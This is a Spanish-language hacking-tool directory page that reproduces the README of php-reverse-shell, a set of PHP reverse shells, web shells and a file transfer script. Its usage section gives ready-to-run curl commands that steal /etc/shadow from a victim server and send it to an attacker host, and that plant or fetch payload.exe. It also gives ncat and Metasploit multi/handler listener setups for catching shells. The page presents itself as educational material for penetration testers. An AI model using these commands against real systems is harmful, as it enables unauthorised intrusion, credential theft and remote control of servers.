Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
php-reverse-shell — Shells de PHP que funcionan en Linux OS, macOS y Windows OS. | Kitploit
Herramientas/GitHubGitHub/ivan-sincek/php-reverse-shell
ExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed TeamingHerramienta de Acceso Remoto
GitHubivan-sincek/php-reverse-shell

php-reverse-shell

Shells de PHP que funcionan en Linux OS, macOS y Windows OS.

Ver Repositorio
571160hace 5 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PHP Reverse Shell

Solo un pequeño repaso al popular script de shell inversa en PHP pentestmonkey/php-reverse-shell. ¡Créditos al autor original!

Funciona en sistemas operativos Linux y macOS con /bin/sh y en sistemas operativos Windows con cmd.exe. El script detectará automáticamente el sistema operativo subyacente.

Funciona tanto con ncat como con multi/handler.

Probado en:

  • XAMPP for Linux v7.3.19 con PHP v7.3.19 en Kali Linux v2020.2 (64 bits),
  • XAMPP for OS X v7.4.10 con PHP v7.4.10 en macOS Catalina v10.15.6 (64 bits),
  • XAMPP for Windows v7.4.3 con PHP v7.4.3 en Windows 10 Enterprise OS (64 bits),
  • Imagen de Docker nouphet/docker-php4 con PHP v4.4.0,
  • Imagen de Docker steeze/php52-nginx con PHP v5.2.17.

Las tuberías de procesos en sistemas operativos Windows no admiten operaciones asíncronas, por lo que stream_set_blocking(), stream_select() y feof() no funcionarán correctamente, pero encontré una solución alternativa.

Creado con fines educativos. ¡Espero que te sirva!

Tabla de contenidos

  • Shells inversas
  • Web Shells
  • Script de subida/descarga de archivos
    • Caso 1: Subir el script al servidor de la víctima
    • Caso 2: Subir el script a tu servidor
  • Configurar un listener
  • Imágenes

Shells inversas

/src/reverse/php_reverse_shell.php requiere PHP v5.0.0 o superior.

/src/reverse/php_reverse_shell_older.php requiere PHP v4.3.0 o superior.

Cambia la dirección IP y el número de puerto dentro de los scripts según sea necesario.

Copia /src/reverse/php_reverse_shell.php al directorio raíz web de tu servidor (p. ej. a /opt/lampp/htdocs/ en XAMPP) o súbelo al servidor web de tu objetivo.

Accede al archivo con tu navegador web preferido.

Web Shells

Consulta el simple PHP web shell basado en peticiones HTTP POST.

Consulta el simple PHP web shell basado en peticiones HTTP GET. Debes codificar en URL tus comandos.

Consulta el simple PHP web shell v2 basado en peticiones HTTP GET. Debes codificar en URL tus comandos.

Script de subida/descarga de archivos

Consulta el script simple de subida/descarga de archivos en PHP basado en peticiones HTTP POST para la subida de archivos y HTTP GET para la descarga.

Al descargar un archivo, debes codificar en URL la ruta del archivo.

Dependiendo de la configuración del servidor, descargar un archivo a través del parámetro de petición HTTP GET puede no funcionar siempre; en su lugar, tendrás que fijar (hardcodear) la ruta del archivo en el script.

Caso 1: Subir el script al servidor de la víctima

Accede al script en el servidor web de la víctima con tu navegador web preferido, o usa cURL desde tu PC.

Sube un archivo al directorio raíz web del servidor desde tu PC:

root@kitploit:~
curl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe

Descarga un archivo del servidor a tu PC:

root@kitploit:~
curl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow

Si elevaste tus privilegios iniciales dentro de tu shell inversa, este script podría no tener los mismos privilegios que la shell. En ese caso, para descargar un archivo concreto, puede que necesites copiar el archivo al directorio raíz web y establecer los permisos de lectura necesarios.

Caso 2: Subir el script a tu servidor

Desde tu shell inversa PHP, ejecuta los siguientes comandos cURL.

Sube un archivo desde el PC de la víctima al directorio raíz web de tu servidor:

root@kitploit:~
curl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow

Descarga un archivo del directorio raíz web de tu servidor al PC de la víctima:

root@kitploit:~
curl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe

curl -skL -X GET https://my-server.com/payload.exe -o payload.exe

Configurar un listener

Para configurar un listener, abre tu consola preferida en Kali Linux y ejecuta uno de los ejemplos siguientes.

Configurar el listener de ncat:

root@kitploit:~
ncat -nvlp 9000

Configurar el listener de multi/handler:

root@kitploit:~
msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

Imágenes

Ncat

Figura 1 - Ncat

Volcado del script

Figura 2 - Volcado del script

Descargar herramienta